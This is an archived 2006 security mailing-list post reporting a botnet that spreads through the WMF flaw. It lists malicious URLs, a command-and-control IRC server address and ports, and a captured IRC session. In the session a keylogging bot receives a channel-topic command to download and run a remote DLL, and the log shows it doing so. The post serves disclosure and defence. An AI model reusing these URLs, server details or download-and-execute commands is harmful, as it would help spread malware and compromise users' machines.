[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY20-F19A7051E0DF3C6EDAA47B1F81F0@phx.gbl>
Date: Fri Jan 20 06:35:53 2006
From: pablo_esterban at hotmail.com (Pablo Esterban)
Subject: Possible large botnet
Seems to be a botnet forming with the help of exploiting the recent wmf flaw
on the following site. AFAIK malware/adware is referencing this.
************D O N O T C L I C K************
http://213.17.233.194/mediabar.wmf
http://213.17.233.194/stat_s3.php
http://213.17.233.194/stat.html
************D O N O T C L I C K************
This injects a trojan connecting to 219.240.142.59 on port 44234
44234/tcp open irc Unreal ircd
47292/tcp open irc Unreal ircd
47296/tcp open irc Unreal ircd
54729/tcp open irc-proxy psyBNC 2.3.1
Channel stats list around 500 bots and around 1200 connected (may or may not
be accurate), however if you poke around you will find
http://219.240.142.59/usage/, containing some interesting links and info
about when this most likely started.
The tcp stream below demos the login, and calling of
http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k
hits on this particular file(!).
NICK *****
USER plnaehe 0 0 :*****
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Found your hostname
:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version
Unreal3.2.3
:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at
17:25:57 KST
:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10
MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307
AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+
CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet
CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX
CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers
:irc.foonet.com 252 *****1 :operator(s) online
:irc.foonet.com 253 *****201 :unknown connection(s)
:irc.foonet.com 254 *****10 :channels formed
:irc.foonet.com 255 *****:I have 1195 clients and 0 servers
:irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529
:irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276
:irc.foonet.com 422 *****:MOTD File is missing
*****MODE *****:+iwTxd
USERHOST *****
:irc.foonet.com 302 *****:*****
MODE *****-x+B
JOIN #mrbean5 rowan
PRIVMSG *****:[KEYLOG]: Key logger active.
USERHOST *****
MODE *****-x+B
JOIN #mrbean5 rowan
USERHOST *****
MODE *****-x+B
JOIN #mrbean5 rowan
:irc.foonet.com NOTICE *****:BOTMOTD File not found
*****MODE *****:-x+B
***** JOIN :#mrbean5
:irc.foonet.com 332 *****#mrbean5 :.wipe
http://219.240.142.59/ppp/mediax.dll mediax.dll 3
:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
:irc.foonet.com 353 *****@ #mrbean5 *****
:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
*****PRIVMSG *****:[KEYLOG]: Key logger active.
:irc.foonet.com 302 *****
:irc.foonet.com 302 *****
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL:
http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
PRIVMSG #mrbean5 :[DOWNLOAD]: Opened:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
_________________________________________________________________
Don't just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Powered by blists - more mailing lists